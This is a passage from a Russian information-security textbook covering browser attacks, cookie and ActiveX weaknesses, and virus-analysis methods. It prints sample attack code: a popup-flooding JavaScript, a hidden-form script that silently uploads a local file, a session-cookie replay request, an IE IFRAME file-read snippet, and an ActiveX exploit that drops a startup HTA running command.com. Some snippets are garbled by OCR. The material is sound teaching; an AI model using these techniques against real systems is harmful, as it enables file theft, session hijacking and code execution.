g.drawString(s, (size().width - fm.stringWidth(s)) / 2, (size().height -
fm.getHeight()) / 2);
for(int i = 0; i < 10000; i++)
{int lx = (int)(Math.random() * 2000D) - 1000;
int ly = (int)(Math.random() * 2000D) - 1000;
gc.setColor(new Color((int)(Math.random() * 16777215D)));
gc.drawLine(lx, ly, max, max);
gc.drawLine(lx, ly, min, min);
gc.drawLine(lx, ly, min, max);
gc.drawLine(lx, ly, max, min);}
gc.drawImage(background, 0, 0, this);
getGraphics().drawImage(img, 0, 0, this);
ultraFried = true;}
repaint();
return true;}
Атакующий JavaScript
Сразу приведем пример атакующего скрипта:
<SCRIPT LANGUAGE="JavaScript">
function WindowBomber()
{var Counter = 0
while (true)
{window.open("http://www.rambler.ru","Crash"+Counter,"width=1,height=1,resizable=no")
198
Counter++ }}
</SCRIPT>
Скрипт начинает открывать Popup-окна до тех пор, пока Windows-
система не зависнет.
Разведчик на JavaScript
Простейшая реализация на Java-script скрипта-разведчика связана с
брешью в безопасности Internet Explorer, позволяющей выполнять ко-
манды Copy и Paste, и отправлять форму без ведома пользователя. B
html есть поле ввода "выбор файла", изначально созданное для отправки
файлов на сервер. Обычно это поле заполняет пользователь и подтвер-
ждает свое действие нажатием кнопки submit. Для реализации скрипта-
разведчика создается форма со скрытым полем <input type="hidden"
name="h1" value="c:\config.sys">, поле для выбора файлов <input
type="file" name="filename" value="c:\config.sys">, после чего пишется
следующий Java-Script, автоматически вызывающийся по событию при
каком-либо действии пользователя, например при загрузке страницы:
<body onLoad="getFile()">:
<Script language="JavaScript">
function getFile()
{document.forms[1].h1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
document.submit(); }
</Script>
4.5.4. Особенности технологии Cookies
Cookies называются небольшие программы, необходимые для со-

здания Web-узлов и специально разработанные для того, чтобы преодо-
леть анонимную природу World Wide Web (WWW). Применение данной
технологии позволяет операторам сайтов накапливать некоторую иден-
тифицирующую информацию непосредственно на машине клиента. А
это, в свою очередь, дает возможность хозяину Web-узла узнавать, с кем
он имеет дело при его посещении пользователем [15].
Собственно cookies — это заголовок Hypertext Transfer Protocol
(HTTP), содержащий строку, которую браузер сохраняет в небольшом
текстовом файле на жестком диске пользователя в каталоге
Windows\Cookies (для Microsoft Internet Explorer) или Users folder (для
199
Netscape Navigator). По размеру cookies могут достигать 4 Kбайт, но
обычно не превышают пары сотен байтов.
HTTP не может сказать, кому он посылает страницы или какие дру-
гие страницы уже переданы им какому-либо конкретному пользователю.
Это было сделано намеренно, для эффективного осуществления сервер-
ных операций, поскольку HTTP не загружен сопровождением пользова-
телей. Однако это означает значительное увеличение объема работы для
сетевых операторов, желающих узнать, кто находится на другом конце
линии.
Cookies обеспечивают Web-узел подобной информацией, отслежи-
вая перемещения пользователя по сайту со страницы на страницу. Так,
например, cookies могут использоваться для того, чтобы определить, на
какой странице (PC или Macintosh) должен обслуживаться клиент при
загрузке ПО.
Cookies позволяют собирать о посетителях достаточно информации,
чтобы в будущем можно было точно определить, кто они и что им нуж-
но. В зависимости от возможностей базы данных сервера эта информа-
ция может быть минимальной. Например, если вы используете таблич-
ную базу данных для записи сведений про вхождение клиента, предпо-
читаемую им форму оплаты, адрес поставки и содержимое его покупа-
тельской корзины, то единственное, что вам нужно сохранять в cookies
— это указатель на запись про клиента в таблице. Это намного более
эффективно и безопасно, чем использовать cookies для сохранения всех
данных регистрационной формы пользователя.
Cookies вовсе не являются единственным способом передачи пер-
сональных данных. Задолго до того, как они появились, существовало,
по крайней мере, два метода, которые использовались с этой целью: пе-
редача данных через спрятанные поля в форме или их прибавление в
конце URL (унифицированного указателя ресурса WWW).
Однако и спрятанные поля, и использование URL имеют суще-
ственные недостатки. Чтобы использовать спрятанные поля, вам нужно
будет обрабатывать каждый запрос на страницу как form Submit (посту-
пивший на рассмотрение), что выглядит все более анахроничным в эпо-
ху динамичного Hypertext Markup Language (HTML). Метод же URL-
суффикс неудовлетворителен с точки зрения безопасности, поскольку не
только показывает, откуда пришел запрос, но и может сообщить любо-
пытным имя и пароль пользователя.
Прочитать cookies может только сервер сайта, который его создал, а
сберегаться в нем может только информация, предоставленная узлом
200
или самим пользователем. Cookies не обладают способностью ни про-
сматривать содержимое жесткого диска пользователя, ни передавать
частную информацию клиента в Internet. Они являются электронным
блокнотом для Web-сайта.
Так cookies могут быть использованы для отслеживания действий
пользователей в WWW. С помощью cookies можно создавать профили
клиентов и встречать их соответствующей рекламой преследовали цель
полнее удовлетворить интересы пользователей. При каждом подключе-
нии клиента к узлу, сервер читает и/или записывает cookies на его жест-
кий диск, накапливая при этом обширную информацию о действиях
пользователя на сайте.
Операторы Web-узлов могут создавать cookies с помощью про-
грамм CGI или JavaScript. JavaScript проще и не требует программиро-
вания сервера. Однако как при использовании CGI, так и любого другого
инструмента сервера, непосредственным создателем cookie является
Document Object браузера. Таким образом, то ли вы применяете CGI,
Microsoft Active Server Pages (поддерживаемые IIS 3.0 или более позд-
ними версиями), то ли JavaScript, вы используете тот же самый код, что-
бы приказать браузеру прочитать, написать или уничтожить cookie.
Кроме того, есть очень много простых примеров с JavaScript-кодом для
работы с cookies, которыми может воспользоваться злоумышленник.
4.5.5. Типовые уязвимости файлов Cookies
Перехват файлов cookies

Самый прямой способ заключается в перехвате файлов cookies при
их передаче по се ти. Затем перехваченные данные можно использовать
при входе на соответствующий сервер. Такую задачу можно решить с
помощью любой утилиты перехвата пакетов. Следующий пример явля-
ется фрагментом восстановленного сеанса связи, во время которого
файл cookies служит для аутентификации и управления доступом к про-
сматриваемым страницам.
SЕТ http://www.victim.net/images/logo.gif HTTP/1.0
Accept: /
Referrer: http://www.victim.net/
Host: www.victim.netCookie: jrunsessionid=96114024278141622;
cuid=TORPM!ZXTFRLRlpWTVFISEblahblah
В приведенном примере виден фрагмент cookies, помещенный в по-
ступающий на сер вер запрос HTTP. Наиболее важным является поле
201
cuid, в котором задается уникальный идентификатор, используемый при
аутентификации пользователя на узле www.victim.net. Допустим, что
после этого взломщик посетил узел victim.net, получил собственный
идентификатор и файл cookies (предполагается, что узел помещает дан-
ные cookies не в виртуальную память, а записывает их на жесткий диск).
Тогда взломщик может открыть свой собственный файл cookies и заме-
нить в нем идентификатор поля cuid, взяв его из перехваченного пакета.
В этом случае при входе на сервер victim.net он будет восприниматься
как пользователь, чьи данные cookies были перехвачены.
Способность специальных программ воспроизводить весь сеанс
связи или его фрагмент значительно облегчает реализацию атак этого
типа. С их помощью можно повторно извлечь страницы, которые про-
сматривались пользователем, используя его данные cookies, перехвачен-
ные ранее, увидеть информацию о вы полненных распоряжениях, предо-
ставить полную запись трафика в расшифрованном виде.
Захват файлов cookie через URL
Специалистам известен сценарий, который извлекает файлы cookie
с клиентского компьютера, если его пользователь щелкает на ссылке, со
держащейся на этой странице. В результате содержимое файла cookies
становится доступным для операторов Web-узла.
Эту возможность можно использовать в неблаговидных целях,
внедряя дескрипторы IFRAME в HTML-код Web-страницы, электронно-
го сообщения в формате HTML или со общения из группы новостей. В
интернете демонстрируется возможность использования дескрипторов
IFRAME совместно с утилитой Peacefire.
Кроме того, имеется возможность составления электронного сооб-
щения, которое "захватывало" бы файлы cookies с жесткого диска поль-
зователя и передавало их на необходимый узел.
4.5.6. Особенности и типовые уязвимости HTML
Изъяны фреймов HTML в Internet Explorer

Особенностью браузера Internet Explorer является возможность ис-
пользования доменной модели обеспечения безопасности ("cross-domain
security model").
Вкратце это означает следующее. Описываемая модель скрыто ис-
пользуется и предотвращает чтение, доступ и любые другие операции с
данными, открытыми в окне одного узла (простейшая форма домена IE),
со стороны окна другого узла. При таком подходе фреймы HTML, от-
202
крытые в каком-либо окне, должны быть доступны только из родитель-
ского окна при условии, что оба они относятся к одному и тому же до-
мену.
Интересной особенностью этой модели является то, что локальная
файловая сис тема, содержимое которой можно просматривать с помо-
щью Internet Explorer, тоже рассматривается как домен. Таким образом,
при нарушении доменной безопасности в распоряжении нечестных опе-
раторов Web-узлов окажется много возможностей про смотра данных не
только других узлов, посещаемых пользователем, но и файлов, которые
находятся на жестком диске посетителя сайта.
Используя некоторые из возможных подходов, достаточно написать
лишь несколь ко строк кода и поместить его на Web-узле или отправить
в электронном сообщении.
Чтение других доменов с помощью дескриптора IFRAME
Экспертами в области безопасности броузеров обнаружено не-
сколько случаев нарушения модели доменной безопасности, предотвра-
щающей обмен данными между доменами.
При реализации кода используется дескриптор IFRAME, который
уже упоминался выше. Этот дескриптор является расширением стандар-
та HTML 4.O. В отличие от стандартного дескриптора FRAME, IFRAME
позволяет создать плавающий фрейм, который располагается посредине
обычной Web-страницы, не содержащей фреймов, подобно вставленно-
му в нее изображению. Это довольно простой способ вставки содержи-
мого других узлов (и даже файловой системы) внутрь Web-страницы,
который прекрасно подходит для скрытого получения доступа к данным
других доменов.
Описываемая реализация представляет собой замечательный при-
мер. В исходном файле дескриптор IFRAME служит для задания ло-
кального файла. Затем в IFRAME вставляется код JavaScript, который
выполняется в домене файловой системы. Если нечестный оператор
Web-узла знает имя файла (или может о нем догадаться) и его местопо-
ложение, то при желании он сможет просмотреть файл любого типа, ко-
торый может быть открыт в окне браузера. Например, файл
winnt\repair\sam._ таким способом прочитать не удастся, поскольку при
этом на экран будет выведено диалоговое окно загрузки файла IE. В ин-
тернете имеется пример кода, который считывает файл C:\test.txt (при
условии, что он существует на диске пользователя). Проверка принад-
лежности к доменам Internet Explorer
203
В июне 2000 года было обнаружено, что в Internet Explorer две
функции не выполняют надлежащую проверку принадлежности к доме-
ну. Это позволяет создать такую страницу HTML, которая открывала бы
фрейм с локальным файлом и могла читать этот файл
Пример использования подобной уязвимости приведен ниже.
<IFRAME ID="I1"X/IFRAME>
<SCRIPT for=Il event="NavigateComplete2(b)"> „alertC'Here is your
file:\n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
fl.navigate("file://c:/test.txt");
'ietTimeout('II.navigate("file://c:/test.txt") ', 1000) ;
</SCRIPT>
Как и в предыдущем случае, в качестве цели был избран файл test.
Но с таким же успехом можно считать любой другой файл системы
пользователя, который можно посмотреть в браузере. Для этого нужно
внести соответствующие изменения в строку
file://c:/test.txt.
Пример использования другой уязвимости Internet Exlorer, приво-
дящей к сбою работы программы приведен ниже.
<body on load = "window();">

</body>
4.5.7. Особенности технологии ActiveX
Под ActiveX понимается набор технологий от Microsoft, направлен-

ных на дополнение, интеграцию и унификацию существующих методов
представления и обработки информации в компьютерных сетях, постро-
енных по Web-архитектуре [15]. Основная идея ActiveX-технологий за-
ключается в использовании одинакового способа доступа ко всем ин-
формационным ресурсам сети (см. рис. 33). В качестве основы такого
унифицированного способа доступа выбрана Web-технология.
204
Рис. 33. Схема доступа к информационным ресурсам сети
В соответствии с ActiveX браузер должен стать частью операцион-
ной системы. Более того, методы доступа к любой информации на соб-
ственном компьютере, на сервере локальной сети или в Internet должны
быть совершенно одинаковы и прозрачны для пользователя.
С точки зрения разработки мобильных программ набор технологий
ActiveX с одной стороны выступает как альтернатива, а с другой — как
существенное дополнение технологий Java и JavaScript. ActiveX обеспе-
чивает не толь ко разработку и выполнение мобильных программ, но и
реализацию ряда дополнительных возможностей, например, вызов из
среды браузера функций по просмотру и редактированию документов
Word, Excel и Power Point. В распоряжение программистов и авторов
Web-документов ActiveX предоставляет набор функций API (Application
Program Interface), реализованный как для клиента, так и для сервера.
ActiveX поддерживает следующие типы мобильных программ, ко-
торые могут быть связаны с Web-документом и передаваться на рабо-
чую станцию для выполнения (см. рис. 34):
 программные компоненты ActiveX Controls;
 аплеты Java;
 программы, написанные на языках JavaScript, VBScript и VRML.
205
Рабочая Cервер
станция
Операционная Операционная
система Программные система Windows
компоненты ActiveX NT Server
Web- Controls Web–сервер
навигатор, Internet
поддерживаю Information
щий ActiveX Server
(Internet Аплеты Java
Explorer) ISAPI и CGI
Виртуальный
Java-
процессор Программы
составленные на СУБД и другие
языках сценариев приложения
Рис. 34. Миграция программ в технологии ActiveX

Технологии по созданию и использованию программных компонен-
тов ActiveX Controls, а также программ, написанных на макроязыке
VBScript, являются собственными разработками Microsoft.
На сервере для действенности технологий ActiveX должны функци-
онировать общесистемные программные средства от Microsoft: операци-
онная система Windows NT Server и Web-сервер IIS (Internet Information
Server). Взаимодействие Web-сервера IIS с другими приложениями,
например с системой управления базами данных (СУБД), обеспечивает-
ся за счет реализованных в нем интерфейсов ISAPI (Internet Server API)
и CGI (Common Gateway Interface).
Программные компоненты ActiveX Controls представляют собой
обычные исполняемые программы, которые могут загружаться с сервера
для испол нения на рабочей станции. Как и при использовании Java-
аплетов ссылки на эти программы располагаются в Web-документах.
Непосредственно в со став Web-документов программные компоненты
ActiveX Controls не входят. Они хранятся в отдельных файлах на сервере.
206
Компоненты ActiveX Controls отличаются от Java-аплетов следую-
щими особенностями:
программы ActiveX Controls включают исполняемый код, завися-
щий от аппаратно-операционной платформы; байт-коды же Java-аплетов
являются машинно-независимыми;
загруженные элементы ActiveX Controls остаются в клиентской си-
стеме, тогда как аплеты Java необходимо каждый раз загружать заново;
поскольку программы ActiveX Controls не работают подобно Java-
аплетам под контролем диспетчера безопасности, они могут получать
доступ к дискам и выполнять другие функции, характерные для тради-
ционных приложений.
Учитывая, что программы ActiveX Controls по сути являются обыч-
ными программными приложениями, то их разработка может осуществ-
ляться с помощью любого языка программирования. Могут быть ис-
пользованы такие инструментальные системы, как Visual C++, Visual
Basic, Delphi, Visual J++ и ряд других. Разработан и комплексный ин-
струментальный пакет Microsoft ActiveX Development Kit (MADK).
Программные компоненты ActiveX Controls, а также программы,
написан ные на макроязыках JavaScript и VBScript, могут включать вы-
зовы функций API ActiveX по предоставлению ряда сервисов, таких как:
создание высококачественных мультимедийных эффектов;
открытие и редактирование электронных документов путем обра-
щения к приложениям, поддерживающим стандарт OLE (связывание и
встраивание объектов), например, к приложениям Microsoft Office;
обращения к операционной системе для оптимальной настройки
пара метров выполнения полученных с сервера программ.
Программы, написанные на макроязыках JavaScript и VBScript, мо-
гут автоматизировать взаимодействие между множеством объектов,
включая аплеты Java, программные компоненты ActiveX Controls и дру-
гие программы на клиентском компьютере, позволяя им работать вместе
как часть интегрированного активного пространства Web. Можно напи-
сать свой макроязык и добавить его интерпретатор в браузер Internet Ex-
plorer с помощью динамически загружаемой библиотеки DLL.
В сравнении с технологией Java технология ActiveX Controls имеет
как недостатки, так и преимущества.
Недостатки связаны прежде всего с более низким уровнем безопас-
ности распределенной обработки информации. Программные компонен-
ты ActiveX Controls, загруженные на клиентскую систему, могут обра-
щаться к любой ее части подобно обычному приложению. Microsoft реа-
207
лизовала в рамках ActiveX доверительную защиту на основе цифровых
сертификатов, которые обеспечивают подтверждение подлинности за-
груженных с сети программных компонентов. Однако подтверждение
подлинности еще не означает подтверждение безопасности. Кроме того,
схема доверительной защиты ActiveX может оказаться недейственной,
когда пользователи загружают программные компоненты ActiveX Con-
trols из Internet, особенно из неизвестных или сомни тельных источни-
ков.
Вместе с тем программные компоненты ActiveX Controls, в отличие
от Java-аплетов, позволяют реализовать функции, свойственные полно-
масштабным программным приложениям. Эта особенность для распре-
деленной обработки является существенным преимуществом при усло-
вии принятия соответствующих мер безопасности, например, при раз-
решении загрузки программ ActiveX Controls только с серверов корпо-
рации.
Что же касается производительности, то поскольку Java является
интерпретируемым языком, аплеты Java выполняются на виртуальной
машине клиентской системы с меньшей скоростью, чем скомпилирован-
ные элементы ActiveX Controls. Но с другой стороны, аплеты Java очень
компактны, по этому загружаются быстро. Для загрузки же программ
ActiveX Controls требуется большее время. Следует также учесть, что за-
груженные программы ActiveX Controls остаются в клиентской системе,
тогда как все аплеты Java необходимо каждый раз загружать заново. Эта
особенность с точки зрения безопасности является недостатком, так как
нарушается централизация прикладной системы. Но с точки зрения про-
изводительности достигается пре имущество перед Java-аплитами.
По независимости от аппаратных и операционных платформ Ac-
tiveX уступает Java-технологии. ActiveX слабо обеспечивает поддержку
операционных систем Macintosh, Sollaris и UNIX. Технология ActiveX
лучше работает на платформах Microsoft Windows, поскольку разрабо-
таны преимущественно для использования функций, встроенных в эти
операционные системы. Соответственно в полной мере ActiveX может
использоваться в сетях, работающих под управлением операционных
систем Microsoft Windows.
Обычно файлы с элементами управления ActiveX имеют расшире-
ние ОСХ исключением являются элементы управления ActiveX, напи-
санные на Java. Они являются в Web-страницы с помощью дескриптора
OBJECT, в котором указано, откуда элемент управления нужно загру-
зить. Когда браузер Internet Explorer обрабатывает Web-страницу с внед-
208
ренным в нее элементом управления ActiveX (или несколькими элемен-
тами управления), первым делом он обращается к локальному систем-
ному реестру. Там он пытается определить, имеется ли на компьютере
требуемый компонент. Если это так, Internet Explorer отображает Web-
страницу, загружает элемент управления в свое адресное пространство и
выполняет его код. Если необходимый элемент управления не найден,
Internet Explorer загружает его из того места, какое указано в дескрипто-
ре <OBJECT>, и устанавливает на компьютере пользователя, кроме того,
с помощью сертификатов Authenticode, браузер выполняет верификацию
автора кода, а затем запускает его. По умолчанию элементы управления
дислоцируются в каталоге \windows\loccache.
4.5.8. Типовые уязвимости в элементах ActiveX
Флаг "Safe for scripting" технологии ActiveX

Летом 1999 года были обнаружены два изъяна в методе обработки
элементов ActiveX браузером Internet Explorer. Установив для элементов
управления флаг "safe for scripting" ("помеченный как безопасный"), их
разработчики могут полностью обойти обычную процедуру проверки
сертификатов Authenticode. В качестве примеров таких элементов Ac-
tiveX можно привести Scriptlet.typelib и Eyedog.ocx, предназначенные
для использования в IE4 и более ранних версиях. Если для этих элемен-
тов управления установлен флаг "safe for scripting", то при их запуске в
браузере на экран не будет выводиться никаких сообщений.
Scriptlet, и Eyedog имеют доступ к файловой системе пользователя.
Элемент Scriptlet.typelib позволяет создавать, редактировать и перезапи-
сывать файлы, хранящиеся на локальном диске, a Eyedog — обращаться
к системному реестру и осуществлять сбор информации о технических
параметрах компьютера.
В интерненте присутствует проверочный код для элемента управ-
ления Scriptlet, который помещает в каталог startup удаленного компью-
тера исполняемый текстовый файл с расширением .НТА (приложение
HTML— HTML Application). При следующей перезагрузке системы этот
файл выполняется, и на экране отображается без обидное сообщение.
Ниже приведен код, реализующий данную идею.
<object id="scr"
ciassid="clsid:06290bd5-48AA-11D2-8432-006008C3FBFC">
<object>
<SCRIPT>
209
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\haker.hta";
scr.Doc="<object id='wsh' classied='clsid:F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B'></object><SCRIPT>alert('Это зловредный код');
wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
Эта уязвимость интерфейсов программного обеспечения, позволя-
ющая получить к ним доступ, названа "случайным троянским ко нем".
Установленные на жесткий диск многих пользователей вместе с таким
популярными приложениями, как IE, данные элементы управления Ac-
tiveX ожидают, пока кто-нибудь не установит с ними удаленное соеди-
нение.
Масштабы потенциального воздействия могут быть устрашающи-
ми. Чтобы установить флаг "safe for scripting" для элемента управления
ActiveX, нужно либо реализовать в них интерфейс lobjectsafety, либо
пометить их как безопасные. Для этого в систем ном реестре в ключ Im-
plemented Categories, соответствующий данному элементу управления,
необходимо добавить параметр 7DD95801-9882-11CF-9FA9-
OOAA006C42C4. Зачастую в системном реестре Windows находится не-
сколько десятков таких элементов управления. Для подобных атак могут
быть использованы те из них, которые могут выполнять действия с по-
вышенными привилегиями (например, запись на диск или запуск кода).
Есть несколько способов, позволяющих определить, какие из эле-
ментов управления активно используются системой. Для обычного про-
смотра активных приложений включая элементы управления ActiveX,
установленных на компьютере, необходимо в меню Start, выбрать коман-
ду Run и ввести dcomcnfg. При этом на экране явится диалоговое окно.
Чтобы посмотреть, имеются ли среди этих объектов помеченные
как "safe for ripting",можно воспользоваться утилитой oleview из набора
NT Resource Kit (ее более новая версия входит в среду разработки при-
ложений Visual Studio компании Microsoft), утилита oleview позволяет
просмотреть все зарегистрированные в системе объекты ActiveX. Кроме
того, она выводит их идентификатор класса (CLSID), используемый при
обращении к этим объектам в системном реестре, и многие важные па-
раметры из поддерева Implemented Categories системного реестра.
210
Кроме того, утилита oleview отображает интерфейсы, экспортируе-
мые объектами, что помогает понять, является ли данный объект хоро-
шей целью для взломщика.
Год спустя был обнаружен еще один подобный элемент управления
под именем Office 2000 UA (OUA), который может быть удаленно ин-
сталлирован с помощью специального кода, внедренного на Web-
странице. Он регистрируется:
- системой во время установки компонентов Microsoft Office;
- макросом документов Office без предупреждения пользователя.
Далее с этой страницы загружается файл с именем evil.doc, в кото-
ром содержится простой макрос, создающий файл С:\dildog-was-here.txt.
4.6. Методы и способы обнаружения и анализа алгорит-

ма вируса
4.6.1. Анализ алгоритма вируса
Методика обнаружения вируса состоит из следующих этапов:

1. Выявить подозрительные проявления:
Наличие autorun.inf файлов в корнях дисков;
Блокирование доступа к определенным сайтам (обычно, анти-
вирусным);
Изменение файла hosts;
Блокирование запуска антивирусных программ;
Украденные аккаунты к программам/сайтам или похищенная
виртуальная собственность из MMORPG;
Несанкционированное открытие веб-страниц;
Измененная стартовая страница браузера;
Всплывающие окна в браузере;
Отключение стандартных служб Windows (Windows Security
Center Service, Windows Firewall/Internet Connection Sharing (ICS) и
т.д.);
Интенсивная дисковая или сетевая активность;
Установленные программы не запускаются.
2. Выявить подозрительную активность, используя Process Monitor и
другие утилиты:
Чтение всех подряд файлов или файлов по определенной маске
(Email-Worms);
Открытие различных файлов и запись в них (Viruses, Trojan-
Ransoms);
211
Открытые сетевые порты (Backdoors) IRC-трафик
(Backdoors/Bots);
Интенсивный Интернет-трафик (Backdoors, Trojan-Proxies).
3. Используя антируткит-утилиты, проверить наличие активных рут-
китов и обезвредить их:
Использовать разнообразные утилиты для более полного ана-
лиза;
Выявить системные перехватчики и снять их;
Выявить файлы, установившие системные перехватчики.
4. Исследовать процессы. Отбросить все процессы, файлы которых
подписаны Microsoft, и среди оставшихся выявить подозрительные:
Упакованные образы (особенно, в %SYSTEM%);
С именами процессов, похожими на системные, но файлы кото-
рых расположены в других каталогах;
Внедренные в системные процессы DLL-файлы (особенно, упа-
кованные библиотеки);
Без цифровой подписи4
Открывающие подозрительные порты (39999 etc);
В дампе памяти которых есть подозрительные строки:
 Имена антивирусных процессов AVP, AVPCC, AVPM и
т.д. IRC-команды NICK, USER, JOIN, PASS и т.д.;
 SMTP-команды и связанные HELO, RCPT, MAIL и т.д.;
 Подозрительные строки Kaspersky., symantec., fsecure. и
т.д. Autorun.inf Подозрительные URL-адреса
***.85.161.165/1.exe;
 Имена P2P-клиентов и пути к их папкам KAZAA, EMULE
и т.д.;
 Названия MMORPG и банков o LINEAGE.EXE и т.д.;
 Названия дистрибутивов программных продуктов
KAZAA.EXE, MSN.EXE, AOL.EXE и т.д.;
 Пути к файлам конфигурации различных программ
%USERPROFILE%\APPLICATION DATA\OPERA\PRO-
FILE\WAND.DAT\WS_FTP.EXE;
 Ресурсы общего доступа по умолчанию ADMIN$, C$, D$;
 Многочисленные строки, напоминающие перебираемые
пароли, представленные в алфавитном порядке 111111,
admin, root;
 Ключи автозапуска системного реестра;
212
 Классы диалоговых окон антивирусов
AVP.AhAppChangedDialog.
5. Проверить точки автозапуска программ, используя утилиту Autoruns:
Сузить диапазон исследования, отбросив файлы c цифровой под-
писью Microsoft;
Выявить подозрительные файлы.
6. Определить подозрительные файлы:
Файлы выявленных подозрительных процессов;
Исполняемые файлы в директории %SYSTEM%, имеющие дату,
наиболее позднюю или отличающуюся от массы остальных файлов.
Наиболее удобным для хранения и анализа вируса объектом является
файл, содержащий его (вируса) тело. Как показывает практика, для ана-
лиза файлового вируса удобнее иметь несколько зараженных файлов раз-
личной, но не очень большой, длины. При этом желательно иметь зара-
женные файлы всех типов (COM, EXE, SYS, BAT, NewEXE), поражае-
мых вирусом. Если необходимо проанализировать часть оперативной па-
мяти, то при помощи некоторых утилит (например, AVPUTIL.COM) до-
вольно просто выделить участок, где расположен вирус, и скопировать
его на диск. Если же требуется анализ сектора MBR или boot-сектора, то
скопировать их в файлы можно при помощи DiskEdit или AVPUTIL. Для
хранения загрузочного вируса наиболее удобным является файл-образ за-
раженного диска. Для его получения необходимо отформатировать дис-
кету, заразить ее вирусом, скопировать образ дискеты (все сектора, начи-
ная с нулевого и кончая последним) в файл.
Главными моментами анализа вируса являются:
 определение сигнатуры вируса;
 вскрытие механизма размножения;
 выявление характера деструктивных воздействий;
 нахождение процедуры восстановления зараженного файла;
 установление алгоритма выполнения вируса;
 определение места вируса в классификации вирусов.
Анализ вирусов проводится с использованием отладочных и дизас-
семблерных программ-утилит. Несложные вирусы малого объема срав-
нительно легко поддаются вскрытию с помощью только отладчика
(например, DEBUG, AFD, Quad Analizer и другие). Повышение сложно-
сти вируса вынуждает использовать дисассемблеры (DisDoc, IDA и дру-
гие).
При анализе файлового вируса определяются:
 типы заражаемых файлов (EXE,COM,SYS),
213
 место внедрения в файл (начало, середина, конец),
 место хранения восстанавливаемой информации файла,
 объем восстановления файла.
При анализе загрузочного вируса важно определить адрес сектора,
в котором вирус сохраняет первоначальный загрузочный сектор.
Для резидентных вирусов, ко всему прочему, определению подлежат:
 адреса точек входа в программы обработки перехватываемых
прерываний;
 место размещения в оперативной памяти своей резидентной
копии;
 возможность записи тела вируса в системные области DOS и
BIOS по фиксированным адресам;
 способность уменьшения размера памяти, выделенной под
DOS;
 способность создания для себя специального MCB-блока.
Процедура восстановления зараженных программ может быть
найдена после отыскания участка вирусного кода, восстанавливающего
зараженную программу перед возвратом ей управления. Часть файла, в
которой найден вирус, забивается нулями.
Анализ вирусов высокой сложности (маскирующихся, зашифрован-
ных, самомодифицирующихся) является далеко непростым делом.
При решении этих задач не обойтись без дизассемблера или отлад-
чика (например, отладчиков AFD, AVPUTIL, SoftICE, TurboDebugger,
дизассемблеров Sourcer или IDA).
И отладчики, и дизассемблеры имеют и положительные и отрица-
тельные черты - каждый выбирает то, что он считает более удобным.
Несложные короткие вирусы быстро "вскрываются" стандартным от-
ладчиком, при анализе объемных и высокосложных полиморфных,
стелс-вирусов не обойтись без дизассемблера. Если необходимо быстро
обнаружить метод восстановления пораженных файлов, достаточно
пройтись отладчиком по началу вируса до того места, где он восстанав-
ливает загруженную программу перед тем, как передать ей управление
(фактически именно этот алгоритм чаще всего используется при лече-
нии вируса). Если же требуется получить детальную картину работы ви-
руса или хорошо документированный листинг, то кроме дизассемблеров
Sourcer или IDA с их возможностями восстанавливать перекрестные
ссылки, здесь вряд ли что поможет. К тому же следует учитывать, что,
во-первых, некоторые вирусы достаточно успешно блокируют попытки
214
протрассировать их коды, а во-вторых, при работе с отладчиком суще-
ствует ненулевая вероятность того, что вирус вырвется из-под контроля.
При анализе файлового вируса необходимо выяснить, какие файлы
(COM, EXE, SYS) поражаются вирусом, в какое место (места) в файле
записывается код вируса - в начало, конец или середину файла, в каком
объеме возможно восстановление файла (полностью или частично), в
каком месте вирус хранит восстанавливаемую информацию.
При анализе загрузочного вируса основной задачей является выяс-
нение адреса (адресов) сектора, в котором вирус сохраняет первоначаль-
ный загрузочный сектор (если, конечно, вирус сохраняет его).
Для резидентного вируса требуется также выделить участок кода, со-
здающий резидентную копию вируса и вычислить возможные адреса точек
входа в перехватываемые вирусом прерывания. Необходимо также опре-
делить, каким образом и где в оперативной памяти вирус выделяет место
для своей резидентной копии: записывается ли вирус по фиксированным
адресам в системные области DOS и BIOS, уменьшает ли размер памяти,
выделенной под DOS (слово по адресу [0000:0413]), создает ли для себя
специальный MCB-блок либо использует какой-то другой способ.
Существуют особые случаи, когда анализ вируса может оказаться
очень сложной для пользователя задачей, например при анализе поли-
морфного вируса. В этом случае используются программы - анализато-
ры кодов программ.
Для анализа макро-вирусов необходимо получить текст их макро-
сов. Для нешифрованных не-стелс вирусов это достигается при помощи
меню Tools/Macro. Если же вирус шифрует свои макросы или использу-
ет стелс-приемы, то необходимо воспользоваться специальными утили-
тами просмотра макросов. Такие специализированные утилиты есть
практически у каждой фирмы-производителя антивирусов, однако они
являются утилитами "внутреннего пользования" и не распространяются
за пределы фирм.
4.6.2. Обнаружение неизвестного вируса
В этом случае необходимо, перед использованием антивирусных

программ и утилит загрузить компьютер с резервной копии ОС, распо-
ложенной на заведомо чистой от вирусов и защищенной от записи дис-
кете или другом носителе, и в дальнейшем использовать программы
только с дискет или других носителей. Это необходимо для того, чтобы
застраховаться от резидентного вируса, так как он может блокировать
работу программ или использовать их работу для инфицирования про-
215
веряемых файлов/дисков. Более того, существует большое количество
вирусов, уничтожающих данные на диске, если они "подозревают", что
их код может быть обнаружен. Конечно же, это требование никак не от-
носится к макро-вирусам.
Обнаружение загрузочного вируса
В загрузочных секторах дисков расположены, как правило, неболь-
шие программы, назначение которых состоит в определении размеров и
границ логических дисков (для MBR винчестера) или загрузке операци-
онной системы (для boot-сектора).
В начале следует прочитать содержимое сектора, подозрительного
на наличие вируса. Для этой цели удобно использовать DiskEdit или
AVPUTIL.
Некоторые загрузочные вирусы практически сразу можно обнару-
жить по наличию различных текстовых строк (например, вирус "Stoned"
содержит строки: "Your PC is now Stoned!", "LEGALISE
MARIJUANA!"). Некоторые вирусы, поражающие boot-секторы дисков,
наоборот, определяются по отсутствию строк, которые обязательно
должны присутствовать в boot-секторе. К таким строкам относятся име-
на системных файлов (например, строка "IO.SYS MSDOS.SYS") и стро-
ки сообщений об ошибках. Отсутствие или изменение строки-заголовка
boot-сектора (строка, содержащая номер версии ОС или название фир-
мы-производителя программного обеспечения, например, "MSDOS5.0"
или "MSWIN4.0") также может служить сигналом о заражении вирусом.
Стандартный загрузчик ОС, расположенный в MBR, занимает
меньше половины сектора, и многие вирусы, поражающие MBR винче-
стера, довольно просто заметить по увеличению длины кода, располо-
женного в секторе MBR.
Однако существуют вирусы, которые внедряются в загрузчик без
изменения его текстовых строк и с минимальными изменениями кода за-
